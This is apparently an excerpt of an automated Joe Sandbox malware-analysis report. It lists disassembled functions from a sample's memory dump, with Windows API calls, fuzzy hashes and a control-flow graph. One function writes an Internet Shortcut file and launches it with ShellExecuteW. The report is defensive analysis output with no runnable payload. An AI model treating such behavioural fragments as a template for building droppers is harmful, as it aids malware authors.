                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002855F,00407E51), ref: 00408558
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 0aad11e7ee877d765d84656ddd848d794259b4e5cafb53358a375b71dd5f0076
                                                                      • Instruction ID: ab45f7bc7acfb16dd5ac8dd98b002b9a080bf8c78aaaf9fad26a1aebec1d9694
                                                                      • Opcode Fuzzy Hash: 0aad11e7ee877d765d84656ddd848d794259b4e5cafb53358a375b71dd5f0076
                                                                      • Instruction Fuzzy Hash:
                                                                      Function 00416078 Relevance: .7, Instructions: 655COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
                                                                      • Instruction ID: 6b4ff145f44d533ad68088221f6a609ab1d7e04152a0c561df1f7ba61bbcd93e
                                                                      • Opcode Fuzzy Hash: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
                                                                      • Instruction Fuzzy Hash: 80327E74A0020ADFCB14CF98C981AFEBBB5EF45304F1641AED845A7345D636EE86CB84
                                                                      Function 0041E919 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12010c70137e7c29a5ca23235328cbf3d08dc96dda7289a0ae066cc07d919471
                                                                      • Instruction ID: 383cb9d78dabc5fc5b9186f807fcaf2870c9c8999f123528d0909e821e960bcd
                                                                      • Opcode Fuzzy Hash: 12010c70137e7c29a5ca23235328cbf3d08dc96dda7289a0ae066cc07d919471
                                                                      • Instruction Fuzzy Hash: CF325531D29F014DD7278635CA22336A659AFB73C4F15D737F81AB5AAAEB28C4C74104
                                                                      Function 00422EC5 Relevance: .3, Instructions: 327COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                      • String ID:
                                                                      • API String ID: 3471368781-0
                                                                      • Opcode ID: fe5be6a6468e820d3e9a1c319386152d4de0f2e029eb669445a27b1e5cc178ee
                                                                      • Instruction ID: 76a18fbcd87e0a5d74895dda48ffde4bc3b525ccaaadd8d74c7dbcd01c42bc64
                                                                      • Opcode Fuzzy Hash: fe5be6a6468e820d3e9a1c319386152d4de0f2e029eb669445a27b1e5cc178ee
                                                                      • Instruction Fuzzy Hash: E6B117356003119BDB349F25DC82BB7B3B8EF54309F94456EE943C6684EABCEA85C718
                                                                      Function 004118EF Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
                                                                      • Instruction ID: 2e46453ac14beeb106431154d774e16853efbb2cb2d74362cb225ff0eef1ff33
                                                                      • Opcode Fuzzy Hash: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
                                                                      • Instruction Fuzzy Hash: 11518271E01219AFDF04CF99C991AEEBBB2EF88300F19805DE515AB311C7349E91CB94
                                                                      Function 00409730 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction ID: cfaf17e61477827595cba3094808e06514427db43c5861e402f0a767dca774d8
                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction Fuzzy Hash: 881131BB261142C3D6148E3DC8F49B7E395EBC5321B2C437BD0426B7DAD23ADD459508
                                                                      Function 004203E8 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                      • Instruction ID: 84d9c5769a8bb5f32b96c16cbcb1e23c183e5fbff20d869f038de853226c9690
                                                                      • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                      • Instruction Fuzzy Hash: 52E04632A11238EBCB15EB999944A8AF2ECEB48B44B5144ABB601D3212C278DE40C7D4
                                                                      Function 0041843F Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
                                                                      • Instruction ID: f98ca3f34d964046128fa04824a014a5ee727e8ff748864cd89c599bd9132bf2
                                                                      • Opcode Fuzzy Hash: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
                                                                      • Instruction Fuzzy Hash: 0DC08C34100A0187CE398A1082B13EE3394B791786F80098EC81A0BF42DD1F9CC2D644
                                                                      Function 003E8790 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 349filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 465 3e8790-3e87f6 call 3e5880 call 3e9620 470 3e87fa-3e8827 CreateFileW call 3e3cc0 465->470 471 3e87f8 465->471 474 3e8829-3e882b 470->474 475 3e8830-3e884c 470->475 471->470 476 3e8b5f-3e8b92 call 3e3cc0 call 407708 474->476 477 3e884e-3e8851 475->477 478 3e8898-3e88ab 475->478 477->478 480 3e8853-3e886a WideCharToMultiByte 477->480 481 3e88b0-3e88b8 478->481 483 3e886c-3e8894 LocalAlloc WideCharToMultiByte 480->483 484 3e8896 480->484 481->481 485 3e88ba-3e88c0 481->485 483->478 484->478 486 3e894c-3e897f WriteFile CloseHandle 485->486 487 3e88c6-3e88cc 485->487 492 3e8a97-3e8a9c 486->492 493 3e8985-3e89a3 486->493 489 3e88ce-3e88d1 487->489 490 3e88d3-3e88d6 487->490 489->490 496 3e8936-3e8938 489->496 499 3e88dd-3e88e0 490->499 500 3e88d8-3e88db 490->500 497 3e8b3d-3e8b58 LocalFree 492->497 498 3e8aa2-3e8ab6 call 3e9620 492->498 494 3e89f8-3e89fe 493->494 495 3e89a5-3e89bd MultiByteToWideChar 493->495 504 3e8a09-3e8a17 494->504 505 3e8a00-3e8a07 494->505 501 3e89bf-3e89ef LocalAlloc MultiByteToWideChar 495->501 502 3e89f5 495->502 508 3e893d-3e8946 496->508 497->476 512 3e8aba-3e8ae0 ShellExecuteW call 3e3cc0 498->512 513 3e8ab8 498->513 506 3e88e7-3e88ee 499->506 507 3e88e2-3e88e5 499->507 500->496 500->499 501->502 502->494 510 3e8a20-3e8a2d 504->510 505->504 505->505 511 3e88f0-3e88f2 506->511 507->496 507->506 508->486 508->487 510->510 514 3e8a2f-3e8a36 510->514 515 3e88fe-3e8903 511->515 516 3e88f4-3e88fa 511->516 526 3e8af4-3e8af7 512->526 527 3e8ae2-3e8af2 call 3e9020 512->527 513->512 518 3e8a5a-3e8a64 514->518 519 3e8a38-3e8a40 514->519 515->496 521 3e8905-3e8934 515->521 516->511 520 3e88fc 516->520 525 3e8a66-3e8a73 518->525 523 3e8a55-3e8a57 519->523 524 3e8a42-3e8a44 519->524 520->521 521->508 523->518 528 3e8a46-3e8a53 524->528 525->525 529 3e8a75-3e8a80 525->529 526->497 531 3e8af9-3e8b0d call 3e9620 526->531 527->526 528->523 528->528 532 3e8a89-3e8a90 529->532 533 3e8a82-3e8a83 LocalFree 529->533 537 3e8b0f 531->537 538 3e8b11-3e8b2e ShellExecuteW call 3e3cc0 531->538 532->492 533->532 537->538 538->497 541 3e8b30-3e8b3a call 3e9020 538->541 541->497
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003E880D
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 003E8860
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E886F
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 003E888B
                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E896B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8977
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E89B3
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E89D2
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E89EF
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8A83
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 003E8ACE
                                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 003E8B1C
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8B4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                      • API String ID: 2199533872-3004881174
                                                                      • Opcode ID: 4574cc4f65deb903a0c11da430621fd06e1fcf6f02bdd8fb4567947fb30f4143
                                                                      • Instruction ID: 000e0b3d755107beeca03cfc3682ea500d31fae4206c30f3601c23897161b052
                                                                      • Opcode Fuzzy Hash: 4574cc4f65deb903a0c11da430621fd06e1fcf6f02bdd8fb4567947fb30f4143
                                                                      • Instruction Fuzzy Hash: F1C13771E002959FEB22CF69CC45BBFBBB5EF54700F54422AE908AB2C1EB748905C795
                                                                      Function 00407769 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00444AF8,00000FA0,?,?,00407747), ref: 00407775
                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00407747), ref: 00407780
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00407747), ref: 00407791
                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004077A3
                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004077B1
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00407747), ref: 004077D4
                                                                      • DeleteCriticalSection.KERNEL32(00444AF8,00000007,?,?,00407747), ref: 004077F0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00407747), ref: 00407800
                                                                      Strings
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040777B
                                                                      • SleepConditionVariableCS, xrefs: 0040779D
                                                                      • WakeAllConditionVariable, xrefs: 004077A9
                                                                      • kernel32.dll, xrefs: 0040778C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 2565136772-3242537097
                                                                      • Opcode ID: 7b421de30c2e04610d4bf51028c0678acc6ac9ddc176320bc9bc560cdd319a21
                                                                      • Instruction ID: a2608d3d7a5849c9e50d4e3015302c50aa918e90dbb92a50b7191df86b630915
                                                                      • Opcode Fuzzy Hash: 7b421de30c2e04610d4bf51028c0678acc6ac9ddc176320bc9bc560cdd319a21
                                                                      • Instruction Fuzzy Hash: F501B535F407115BD7311B75BC0DF273A58AB85B81B550036B801F36A0DBB8E80186BE
                                                                      Function 00404F20 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 277COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00404F27
                                                                      • collate.LIBCPMT ref: 00404F33
                                                                        • Part of subcall function 00403E70: __EH_prolog3_GS.LIBCMT ref: 00403E77
                                                                        • Part of subcall function 00403E70: __Getcoll.LIBCPMT ref: 00403EDB
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • __Getcoll.LIBCPMT ref: 00404F76
                                                                        • Part of subcall function 00403CD4: __EH_prolog3.LIBCMT ref: 00403CDB
                                                                        • Part of subcall function 00403CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00403CE5
                                                                        • Part of subcall function 00403CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00403D56
                                                                        • Part of subcall function 003F4403: __EH_prolog3.LIBCMT ref: 003F440A
                                                                        • Part of subcall function 003F4403: std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                        • Part of subcall function 003F4403: std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • numpunct.LIBCPMT ref: 004051A6
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                      • String ID: dJD$hJD$lJD$pJD$tJD$xJD$|JD
                                                                      • API String ID: 2732324234-253554797
                                                                      • Opcode ID: 505f068883c7f5b9049600b5b150f1ee61d53529cda4702d660a1eac354d3180
                                                                      • Instruction ID: be31a7dc8e9b851f16c43425728a068878b4392eaeee7130d82b8575fcf69704
                                                                      • Opcode Fuzzy Hash: 505f068883c7f5b9049600b5b150f1ee61d53529cda4702d660a1eac354d3180
                                                                      • Instruction Fuzzy Hash: D991EBB1D046155BD722AB66880577F7AA8EF81350F11853FF9457B2C1DF388D008BE9
                                                                      Function 003FD8F6 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 433COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003FD8FD
                                                                      • ctype.LIBCPMT ref: 003FD944
                                                                        • Part of subcall function 003FD458: __Getctype.LIBCPMT ref: 003FD467
                                                                        • Part of subcall function 003F79C9: __EH_prolog3.LIBCMT ref: 003F79D0
                                                                        • Part of subcall function 003F79C9: std::_Lockit::_Lockit.LIBCPMT ref: 003F79DA
                                                                        • Part of subcall function 003F79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7A4B
                                                                        • Part of subcall function 003F7AF3: __EH_prolog3.LIBCMT ref: 003F7AFA
                                                                        • Part of subcall function 003F7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 003F7B04
                                                                        • Part of subcall function 003F7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7B75
                                                                        • Part of subcall function 003F7CB2: __EH_prolog3.LIBCMT ref: 003F7CB9
                                                                        • Part of subcall function 003F7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 003F7CC3
                                                                        • Part of subcall function 003F7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7D34
                                                                        • Part of subcall function 003F7C1D: __EH_prolog3.LIBCMT ref: 003F7C24
                                                                        • Part of subcall function 003F7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 003F7C2E
                                                                        • Part of subcall function 003F7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C9F
                                                                        • Part of subcall function 003F4403: __EH_prolog3.LIBCMT ref: 003F440A
                                                                        • Part of subcall function 003F4403: std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                        • Part of subcall function 003F4403: std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • collate.LIBCPMT ref: 003FDA78
                                                                      • numpunct.LIBCPMT ref: 003FDCF2
                                                                        • Part of subcall function 003F838F: __EH_prolog3.LIBCMT ref: 003F8396
                                                                        • Part of subcall function 003F80C5: __EH_prolog3.LIBCMT ref: 003F80CC
                                                                        • Part of subcall function 003F80C5: std::_Lockit::_Lockit.LIBCPMT ref: 003F80D6
                                                                        • Part of subcall function 003F80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 003F8147
                                                                        • Part of subcall function 003F81EF: __EH_prolog3.LIBCMT ref: 003F81F6
                                                                        • Part of subcall function 003F81EF: std::_Lockit::_Lockit.LIBCPMT ref: 003F8200
                                                                        • Part of subcall function 003F81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 003F8271
                                                                        • Part of subcall function 003F4403: Concurrency::cancel_current_task.LIBCPMT ref: 003F44C6
                                                                        • Part of subcall function 003F75B6: __EH_prolog3.LIBCMT ref: 003F75BD
                                                                        • Part of subcall function 003F75B6: std::_Lockit::_Lockit.LIBCPMT ref: 003F75C7
                                                                        • Part of subcall function 003F75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7638
                                                                      • __Getcoll.LIBCPMT ref: 003FDAB8
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                      • codecvt.LIBCPMT ref: 003FDDA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                      • String ID: ID$ID$ID$ID
                                                                      • API String ID: 613171289-34575223
                                                                      • Opcode ID: 58da07a88f0b782d86f9213821daee510ba4df17670c4719be309b5e1584e3cc
                                                                      • Instruction ID: 73f2bc39e71947aa9da5a6ca5e9765ae33888d04584ae2a95fcf56a56fd8b6d0
                                                                      • Opcode Fuzzy Hash: 58da07a88f0b782d86f9213821daee510ba4df17670c4719be309b5e1584e3cc
                                                                      • Instruction Fuzzy Hash: C6E105B1D0021E9BDB13AFA68C0667F7AAAEF41350F15852EFA586F391DF708D009791
                                                                      Function 003EF010 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,755CD0F6,?,00000000), ref: 003EF076
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EF0B3
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EF11D
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EF2B9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EF376
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003EF39E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
